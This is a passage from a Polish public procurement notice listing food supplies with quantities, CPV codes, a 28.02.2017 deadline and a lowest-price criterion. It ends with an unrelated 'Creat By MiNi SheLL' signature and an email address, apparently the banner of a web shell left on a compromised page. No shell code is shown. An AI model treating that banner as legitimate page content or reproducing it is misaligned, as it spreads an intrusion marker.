Pieprz naturalny mielony 1kg	szt		17,
Pieprz ziołowy 20g	szt		50,
Płatki śniadaniowe kuleczki czekoladowe 1kg	szt		50,
Płatki śniadaniowe w miodzie 1kg	szt		20,
Płatki śniadaniowe kukurydziane 1kg	szt		160,
Proszek do pieczenia 32g	szt		150,
Przyprawa curry 25g Knorr lub równoważna	szt		50,
Przyprawa do gyrosa 500g Knorr lub równoważna	szt		3,
Przyprawa do grilla 500g Knorr lub równoważna	szt		2,
Przyprawa do kurczaka 500g Knorr lub równoważna	szt		3,
Przyprawa do drobiu Delikat Knorr 600g lub równoważna	szt		25,
Przyprawa do mięsa 600g Delikat Knorr lub równoważna, w której składzie znajduja się m.in.:sól, papryka, cebula,czosnek, natka pietruszki,rozmaryn,pieprz,oregano.tymianek,majeranek 	szt		5,
Przyprawa do flaków Knorr 25g lub równoważna	szt		50,
Przyprawa w płynie 860ml Delikat Knorr lub równoważna	szt		70,
Przyprawa uniwersalna 5kg Degusta lub równoważna	szt		25,
Ryż długoziarnisty	kg		410,
Soda oczyszczona 20g	szt		25,
Soczki marchwiowo-owocowe 330ml 	Szt		1500,
Sok pomidorowy 330ml	Szt		800,
Sos sałatkowy 700g	szt		10,
Sól drobnoziarnista 	kg		340,
Sól ziołowa 30g	szt		25,
Słodzik 1200 tabletek	szt		20,
Syrop owocowy 5l	szt		130,
Szpinak mrożony 	kg		170,
Szprot w oleju 170g	szt		60,
Makrela  w pomidorach 170g	szt		900,
Śmietana w proszku Śnieżka 60g lub równoważna	szt		25,
Tymianek 10g	szt		30,
Tuńczyk w sosie własnym 185g	szt		60,
Tuńczyk w oleju 170g	szt		70,
Truskawki mrożone	kg		80,
Talarki ziemniaczane mrożone 	Kg		30,
Wiórki kokosowe 200g	szt		16,
Wiśnie mrożone 	kg		8,
Wafle śmietankowe 2,5kg	szt		2,
Wafle ryżowe naturalne 110g	szt		144,
Warzywa na patelnie mrożone Euromix lub równoważne	kg		30,
Woda mineralna 1,5l gaz	szt		150,
Zając czekoladowy 16g	szt		110,
Ziele angielskie 1kg	Szt		7,
Żelatyna spożywcza 50g	szt		25,
Żurek staropolski 500ml	szt		100,
Żurawina suszona 200g	Szt		5,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com